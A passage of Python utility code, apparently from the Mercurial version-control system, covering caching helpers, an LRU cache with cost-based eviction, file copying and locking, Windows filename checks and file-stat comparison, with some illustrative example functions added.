1058 # (3, 6) -> (3, 6, None)
1060 # (3, 6) -> (3, 6, None)
1059 while len(vints) < 3:
1061 while len(vints) < 3:
1060 vints.append(None)
1062 vints.append(None)
1061
1063
1062 if n == 2:
1064 if n == 2:
1063 return (vints[0], vints[1])
1065 return (vints[0], vints[1])
1064 if n == 3:
1066 if n == 3:
1065 return (vints[0], vints[1], vints[2])
1067 return (vints[0], vints[1], vints[2])
1066 if n == 4:
1068 if n == 4:
1067 return (vints[0], vints[1], vints[2], extra)
1069 return (vints[0], vints[1], vints[2], extra)
1068
1070
1069 def cachefunc(func):
1071 def cachefunc(func):
1070 '''cache the result of function calls'''
1072 '''cache the result of function calls'''
1071 # XXX doesn't handle keywords args
1073 # XXX doesn't handle keywords args
1072 if func.__code__.co_argcount == 0:
1074 if func.__code__.co_argcount == 0:
1073 cache = []
1075 cache = []
1074 def f():
1076 def f():
1075 if len(cache) == 0:
1077 if len(cache) == 0:
1076 cache.append(func())
1078 cache.append(func())
1077 return cache[0]
1079 return cache[0]
1078 return f
1080 return f
1079 cache = {}
1081 cache = {}
1080 if func.__code__.co_argcount == 1:
1082 if func.__code__.co_argcount == 1:
1081 # we gain a small amount of time because
1083 # we gain a small amount of time because
1082 # we don't need to pack/unpack the list
1084 # we don't need to pack/unpack the list
1083 def f(arg):
1085 def f(arg):
1084 if arg not in cache:
1086 if arg not in cache:
1085 cache[arg] = func(arg)
1087 cache[arg] = func(arg)
1086 return cache[arg]
1088 return cache[arg]
1087 else:
1089 else:
1088 def f(*args):
1090 def f(*args):
1089 if args not in cache:
1091 if args not in cache:
1090 cache[args] = func(*args)
1092 cache[args] = func(*args)
1091 return cache[args]
1093 return cache[args]
1092
1094
1093 return f
1095 return f
1094
1096
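# An illustrative sketch, not part of the upstream module: how
# cachefunc-style memoization behaves. The name _cachefunc_example is
# hypothetical and the function is never called at import time.
def _cachefunc_example():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = cachefunc(square)
    assert cached(4) == 16
    assert cached(4) == 16
    # The second lookup was served from the cache, so square ran only once.
    assert calls == [4]
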
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

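# An illustrative sketch, not part of the upstream module: the minimal
# shape of a transactional subclass. The class name is hypothetical. Used
# as a context manager, close() runs only when the "with" body succeeds,
# while release() always runs and is expected to abort anything left
# unclosed.
class _demotransaction(transactional):
    def __init__(self):
        self.closed = False
        self.released = False

    def close(self):
        self.closed = True

    def release(self):
        # A real transaction would roll back here if close() never ran.
        self.released = True
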
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (r'next', r'prev', r'key', r'value', r'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that this doesn't make peek() thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

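# An illustrative sketch, not part of the upstream module: capacity- and
# cost-based eviction in lrucachedict. Keys and costs are invented example
# values; nothing here runs at import time.
def _lrucachedict_example():
    d = lrucachedict(2)
    d[b'a'] = 1
    d[b'b'] = 2
    d[b'c'] = 3
    # Capacity is 2, so the least recently used key (b'a') was evicted.
    assert b'a' not in d and b'b' in d and b'c' in d

    costed = lrucachedict(10, maxcost=100)
    costed.insert(b'x', b'blob', cost=80)
    costed.insert(b'y', b'blob', cost=80)
    # Total cost (160) exceeded maxcost (100), so older nodes were pruned
    # down toward the 75% target; the newest insertion always survives.
    assert b'x' not in costed and b'y' in costed
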
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

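# An illustrative sketch with hypothetical names, not part of the upstream
# module: propertycache runs the decorated function once per instance, then
# stores the result in the instance __dict__, so later lookups never reach
# the descriptor until clearcachedproperty() drops the cached value.
class _propertycacheexample(object):
    computed = 0

    @propertycache
    def answer(self):
        self.computed += 1
        return 42

def _propertycache_example():
    obj = _propertycacheexample()
    assert obj.answer == 42 and obj.answer == 42
    assert obj.computed == 1          # the function body ran only once
    clearcachedproperty(obj, b'answer')
    assert obj.answer == 42           # recomputed after the cache was cleared
    assert obj.computed == 2
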
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

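# An illustrative sketch, not part of the upstream module: many small
# chunks fed through increasingchunks come out as progressively larger
# buffers, each at least the current minimum, which doubles toward max.
# The chunk sizes below are invented example values.
def _increasingchunks_example():
    source = (b'x' * 100 for _ in range(50))   # 50 chunks of 100 bytes
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    assert sizes[0] >= 1024                    # first buffer met the minimum
    assert sum(sizes) == 5000                  # no data lost or duplicated
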
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

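# An illustrative sketch with a hypothetical name, not part of the upstream
# module: nogc as a decorator around code that allocates many container
# objects, so the cyclic GC doesn't repeatedly fire mid-build. On PyPy,
# nogc above is a no-op because PyPy runs slower with its GC disabled.
@nogc
def _buildbigmapping_example(n):
    return {i: [i] for i in range(n)}
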
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

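# An illustrative sketch with hypothetical names, not part of the upstream
# module: checksignature converts a TypeError raised at the call boundary
# (wrong argument count) into error.SignatureError, while TypeErrors from
# inside the wrapped function still propagate unchanged.
def _checksignature_example():
    def onearg(x):
        return x
    wrapped = checksignature(onearg)
    try:
        wrapped(1, 2)
    except error.SignatureError:
        pass                          # bad arity was reported distinctly
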
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

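# An illustrative sketch with hypothetical paths and helper name, not part
# of the upstream module: typical copyfile invocations. hardlink=True only
# attempts a hardlink when the destination filesystem is whitelisted, and
# silently falls back to a plain copy otherwise.
def _copyfile_example(src, dest):
    copyfile(src, dest)                             # copy, preserving mode
    copyfile(src, dest + b'.stat', copystat=True)   # also carry atime/mtime
    copyfile(src, dest + b'.link', hardlink=True)   # try a hardlink first
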
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

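# An illustrative sketch with a hypothetical path and payload, not part of
# the upstream module: a makelock/readlock roundtrip. Where os.symlink
# exists, the lock is a symlink whose target carries the info; otherwise an
# O_EXCL-created file holds it. readlock recovers the payload either way.
def _lock_example(pathname):
    makelock(b'hostname:12345', pathname)
    assert readlock(pathname) == b'hostname:12345'
    unlink(pathname)                  # clean up the example lock
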
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

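# An illustrative sketch, not part of the upstream module: callers use the
# module-level `re` object like the stdlib module; whether a pattern ends
# up backed by re2 or by remod is an internal detail. The pattern below is
# an invented example value.
def _re_example():
    pat = re.compile(br'ba[rz]', remod.IGNORECASE)
    assert pat.match(b'BAR') is not None
    assert re.escape(b'a+b') == br'a\+b'
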
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

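# A minimal usage sketch for fspath() (hypothetical repository layout):
# both arguments must already be normcase-ed, and the result restores the
# on-disk spelling of each path component, consulting _fspathcache.
#
#   # on a case-insensitive filesystem where the file is stored as "README"
#   fspath(normcase(b'readme'), normcase(b'/repo'))  # -> b'README'
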
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

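# A minimal usage sketch (hypothetical path): callers probe a file that
# lives on the filesystem they care about; a False result means nlinks()
# cannot be trusted there (e.g. on some Windows/Samba shares).
#
#   if not checknlink(b'/repo/.hg/store/lock'):
#       pass  # avoid relying on hardlink counts on this filesystem
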
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents as the file 'name'

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

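# A minimal usage sketch (hypothetical path): the returned temporary file
# sits next to the original and inherits its permission bits, so a later
# rename() over the original is atomic on the same filesystem.
#
#   temp = mktempcopy(b'/repo/.hg/requires', emptyok=True)
#   # ... write the new content to temp, then rename(temp, original name)
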
class filestat(object):
    """Helper to exactly detect changes of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists; otherwise it is None. This avoids a preparatory
    'exists()' check on the caller's side.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
